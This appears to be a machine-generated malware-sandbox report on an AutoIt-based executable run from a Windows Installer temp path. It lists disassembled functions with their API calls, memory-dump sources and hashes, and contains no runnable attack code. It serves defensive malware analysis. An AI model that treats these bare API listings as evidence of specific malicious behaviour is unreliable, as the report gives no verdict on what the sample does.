                                          • Part of subcall function 003231B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 003231DA
                                          • Part of subcall function 00323A67: SHGetMalloc.SHELL32(1<2), ref: 00323A7D
                                          • Part of subcall function 00323A67: SHGetDesktopFolder.SHELL32(?), ref: 00323A8F
                                          • Part of subcall function 00323A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00323AD2
                                          • Part of subcall function 00323B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,003E22E8,?), ref: 00323B65
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                        • String ID: X
                                        • API String ID: 2727075218-3081909835
                                        • Opcode ID: 253f05db1adc7408adfc68a043873b01a96648e5ef960f00d65008810b454358
                                        • Instruction ID: d5a398f8bb82c16b1b89a6728e0147293bffbe1859780c50dd4886ec2ce0505b
                                        • Opcode Fuzzy Hash: 253f05db1adc7408adfc68a043873b01a96648e5ef960f00d65008810b454358
                                        • Instruction Fuzzy Hash: 71118AB1A10298ABCF06DFD4E8456DE7BFDAF45704F04400AE501BF341DBB95A498BA1
                                        Function 003234C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                        Download Yara Rule
                                        Strings
                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 003934AA
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: LibraryLoad
                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                        • API String ID: 1029625771-2684727018
                                        • Opcode ID: b413400bfb629f5f3dbdfb5f248d7fc48a156773cd84a35316a362591a7e7f41
                                        • Instruction ID: 804b304cbbd981ce92c99661a82d863089d9705c8f200575cb7ffe015f141cf1
                                        • Opcode Fuzzy Hash: b413400bfb629f5f3dbdfb5f248d7fc48a156773cd84a35316a362591a7e7f41
                                        • Instruction Fuzzy Hash: 45F0687190121DBE8F13FFB5D8518FFB7BCAA10300B118526F81596081EB389B09CB61
                                        Function 00366852 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00366623: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000001,00000003,?,0036685E,?,?,?,00394A5C,003BE448,00000003,?,?), ref: 003666E2
                                        • WriteFile.KERNEL32(?,?,">,00000000,00000000,?,?,?,00394A5C,003BE448,00000003,?,?,00324C44,?,?), ref: 0036686C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: File$PointerWrite
                                        • String ID: ">
                                        • API String ID: 539440098-2195902231
                                        • Opcode ID: f2b4a30a4a33a4ce19e0e4be9f8c40c1ccbda5d0a17fa9ea71e221c1957406e1
                                        • Instruction ID: 6e57d132dcc31e968299a865ce8240e37381a7dc759a7fc158a1303f92545ad8
                                        • Opcode Fuzzy Hash: f2b4a30a4a33a4ce19e0e4be9f8c40c1ccbda5d0a17fa9ea71e221c1957406e1
                                        • Instruction Fuzzy Hash: 6FE04636000208BBDB21AF94E801A8ABBBCEB04350F00451AF94295010D7B5AE149BA4
                                        Function 0035E390 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0032193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00321952
                                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0035E3AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessageSend$Timeout
                                        • String ID: @U=u
                                        • API String ID: 1777923405-2594219639
                                        • Opcode ID: 382ffd0c4030309e6231d8f9540af99d3af7f573e0ca908b02d9b71742f46d30
                                        • Instruction ID: fe46ea8cb2d69cf15368ded9852429a6b6c091f3ad3e2656ae6dbfba6b1aa6ad
                                        • Opcode Fuzzy Hash: 382ffd0c4030309e6231d8f9540af99d3af7f573e0ca908b02d9b71742f46d30
                                        • Instruction Fuzzy Hash: F0D01235144120AAFA766F14FD06FC177969B41751F120459B9816B0F5C7D25C815580
                                        Function 0033F461 Relevance: 3.2, APIs: 2, Instructions: 159COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3b344951f7e23dd6caf10966960425e8a87dcf098a05282f5c22cc8fe8d1a80a
                                        • Instruction ID: 2e9d914cc0be5150c5e6ed9dde74b402fd502247688c7626241155104517e6b6
                                        • Opcode Fuzzy Hash: 3b344951f7e23dd6caf10966960425e8a87dcf098a05282f5c22cc8fe8d1a80a
                                        • Instruction Fuzzy Hash: 9B51D5316043019FCB16EF28D4D1BAA73E5AF89310F54856DF9968F292DB30ED45CB91
                                        Function 00378065 Relevance: 3.1, APIs: 2, Instructions: 98COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCursorPos.USER32(?), ref: 00378074
                                        • GetForegroundWindow.USER32 ref: 0037807A
                                          • Part of subcall function 00376B19: GetWindowRect.USER32(?,?), ref: 00376B2C
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$CursorForegroundRect
                                        • String ID:
                                        • API String ID: 1066937146-0
                                        • Opcode ID: e75e2c9bae540d4067ff2e1b81aa48dbe38c1c61f002c9341e64bbc63fde529a
                                        • Instruction ID: d1b1bb85cab55f670752ce170f8e0ff635a3916c8ee1e37ef24c997d3bbf0625
                                        • Opcode Fuzzy Hash: e75e2c9bae540d4067ff2e1b81aa48dbe38c1c61f002c9341e64bbc63fde529a
                                        • Instruction Fuzzy Hash: 0C313475A00218AFDB12EFA4DC85AEEB7B8FF14314F508429F946AB251DB34AE45CB50
                                        Function 00321DCE Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        • IsWindow.USER32(00000000), ref: 0039DB31
                                        • IsWindow.USER32(00000000), ref: 0039DB6B
                                          • Part of subcall function 00321F04: GetForegroundWindow.USER32 ref: 00321FBE
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: Window$Foreground
                                        • String ID:
                                        • API String ID: 62970417-0
                                        • Opcode ID: 5af77ce80281c8f72209476c51de3b619007b65366f708da7f8372a04813281b
                                        • Instruction ID: e798bc93bb328b326ffb4a85f7c1d2d848cf9118dfbae75d36242709233134a1
                                        • Opcode Fuzzy Hash: 5af77ce80281c8f72209476c51de3b619007b65366f708da7f8372a04813281b
                                        • Instruction Fuzzy Hash: EA21DF72600206BBDB22AF34DC81BFEB7AD9F80784F124429F95ACB141DB74EE019760
                                        Function 00323682 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                        Download Yara Rule
                                        APIs
                                        • 74BFC8D0.UXTHEME ref: 003236E6
                                          • Part of subcall function 00342025: __lock.LIBCMT ref: 0034202B
                                          • Part of subcall function 003232DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 003232F6
                                          • Part of subcall function 003232DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0032330B
                                          • Part of subcall function 0032374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0032376D
                                          • Part of subcall function 0032374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0032377F
                                          • Part of subcall function 0032374E: GetFullPathNameW.KERNEL32(C:\Windows\Installer\MSI4976.tmp,00000104,?,003E1120,C:\Windows\Installer\MSI4976.tmp,003E1124,?,?), ref: 003237EE
                                          • Part of subcall function 0032374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00323860
                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00323726
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                        • String ID:
                                        • API String ID: 3809921791-0
                                        • Opcode ID: 1cc7e031dc84bc159670a80748c00e89daf5f296be9a30f33730441e12e72b88
                                        • Instruction ID: 7187f65d29c43aef77a6b6ae23babd68d7ffa9ed9a556ab827971e602927b320
                                        • Opcode Fuzzy Hash: 1cc7e031dc84bc159670a80748c00e89daf5f296be9a30f33730441e12e72b88
                                        • Instruction Fuzzy Hash: 20118E719083919BC722DF29E88591BFBECEB85750F00461EF4858B2A1DB709A44CF92
                                        Function 00324B88 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00324C2B,?,?,?,?,0032BE63), ref: 00324BB6
                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00324C2B,?,?,?,?,0032BE63), ref: 00394972
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 86591dab9e3ba3c9d18e7adb6af16c7c575234a0226864762f3f922dfdaf9ac8
                                        • Instruction ID: d094a3e7a26db196c958b9194c2442716ec5561c93e9dc005da0c2a15bd3dcfe
                                        • Opcode Fuzzy Hash: 86591dab9e3ba3c9d18e7adb6af16c7c575234a0226864762f3f922dfdaf9ac8
                                        • Instruction Fuzzy Hash: 6D01B170248318BEF7364E24DC8AF667BDCEB05B68F108319BAE56A1E0C6B09C45CB50
                                        Function 0033F26B Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                        Download Yara Rule
                                        APIs
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0036AEA5,?,?,00000000,00000008), ref: 0033F282
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0036AEA5,?,?,00000000,00000008), ref: 0033F2A6
                                          • Part of subcall function 0033F2D0: _memmove.LIBCMT ref: 0033F307
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide$_memmove
                                        • String ID:
                                        • API String ID: 3033907384-0
                                        • Opcode ID: 0b0d4f02337926ba9fd0a98a64671dee5c366982df95fec868719f63b1f7a066
                                        • Instruction ID: 8dddc25afe0bc01572cea83dbc3d9ef11a86aaaba40cd8e38985506b66d0ac6e
                                        • Opcode Fuzzy Hash: 0b0d4f02337926ba9fd0a98a64671dee5c366982df95fec868719f63b1f7a066
                                        • Instruction Fuzzy Hash: 9FF04FBA504114BFAB12AB65DC84CBB7FADEF8A360B408426FD09CE111CA31DC018770
                                        Function 0034F782 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___lock_fhandle.LIBCMT ref: 0034F7D9
                                        • __close_nolock.LIBCMT ref: 0034F7F2
                                          • Part of subcall function 0034886A: __getptd_noexit.LIBCMT ref: 0034886A
                                          • Part of subcall function 0034889E: __getptd_noexit.LIBCMT ref: 0034889E
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                        • String ID:
                                        • API String ID: 1046115767-0
                                        • Opcode ID: a567a58d57c3f8f5bc0fc224f848b41c6c13cc4e0dae405db6e8e6144638e2d1
                                        • Instruction ID: b622337bd3c871cda8a30229a2c2534ee9602ee058c1df5fa10c04feef78fae6
                                        • Opcode Fuzzy Hash: a567a58d57c3f8f5bc0fc224f848b41c6c13cc4e0dae405db6e8e6144638e2d1
                                        • Instruction Fuzzy Hash: 87118272C05A548ED7137FA4D88235D7AD49F41331F5A0360E4706F1E3DBB4B9418AA1
                                        Function 003234F3 Relevance: 3.0, APIs: 2, Instructions: 49COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0032352A
                                          • Part of subcall function 00327E53: _memmove.LIBCMT ref: 00327EB9
                                        • _wcscat.LIBCMT ref: 003966C0
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: FullNamePath_memmove_wcscat
                                        • String ID:
                                        • API String ID: 257928180-0
                                        • Opcode ID: 34ce661aeeabdde6e0189a092bbde9d06d537bd5e4ea56d4563d72261f240793
                                        • Instruction ID: a5f18f6302e623030e425bec44bfb18a5b105cba8e1740602f98088437b0a59a
                                        • Opcode Fuzzy Hash: 34ce661aeeabdde6e0189a092bbde9d06d537bd5e4ea56d4563d72261f240793
                                        • Instruction Fuzzy Hash: 7801D63594412C9BCF03FBA1E8459DD73F9EF14348F1142A5B519DB1D0EA30DB858BA1
                                        Function 00379500 Relevance: 3.0, APIs: 2, Instructions: 46networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 00379534
                                        • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00379557
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: ErrorLastsend
                                        • String ID:
                                        • API String ID: 1802528911-0
                                        • Opcode ID: c73b3d6d7d24c5cda49354bf14c6ffefc0229ae7b15b04fc878ebec215a13193
                                        • Instruction ID: eac0a3feec61bf90e945d64b8d0de844c83fbe60083e2ca54979ccf2604f5210
                                        • Opcode Fuzzy Hash: c73b3d6d7d24c5cda49354bf14c6ffefc0229ae7b15b04fc878ebec215a13193
                                        • Instruction Fuzzy Hash: B6017C352002009FD715EF28D891B6AB7E9EB99720F10C12AE64ACB391CA71EC01CB90
                                        Function 00344274 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0034889E: __getptd_noexit.LIBCMT ref: 0034889E
                                        • __lock_file.LIBCMT ref: 003442B9
                                          • Part of subcall function 00345A9F: __lock.LIBCMT ref: 00345AC2
                                        • __fclose_nolock.LIBCMT ref: 003442C4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                        • String ID:
                                        • API String ID: 2800547568-0
                                        • Opcode ID: 13605c21fb87c3bee69c1d2a3c6f6308898535d460a0d7733b5a299723143a1e
                                        • Instruction ID: 766f5eab3476edd4e2ccc0d594314735ec62eaff4fcf03c97db47aca5c319ff3
                                        • Opcode Fuzzy Hash: 13605c21fb87c3bee69c1d2a3c6f6308898535d460a0d7733b5a299723143a1e
                                        • Instruction Fuzzy Hash: 86F0B431C01B049BD713AF7588027AE6BD0AF40334F618A19F824AF1C2CBBCB9019F51
                                        Function 0033F55E Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • timeGetTime.WINMM ref: 0033F57A
                                          • Part of subcall function 0032E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0032E279
                                        • Sleep.KERNEL32(00000000), ref: 003975D3
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.2613829583.0000000000321000.00000040.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                        • Associated: 00000003.00000002.2613783766.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.00000000003FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2613829583.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614180276.000000000048B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.2614226844.000000000048C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_320000_MSI4976.jbxd
                                        Similarity
                                        • API ID: MessagePeekSleepTimetime
                                        • String ID:
                                        • API String ID: 1792118007-0
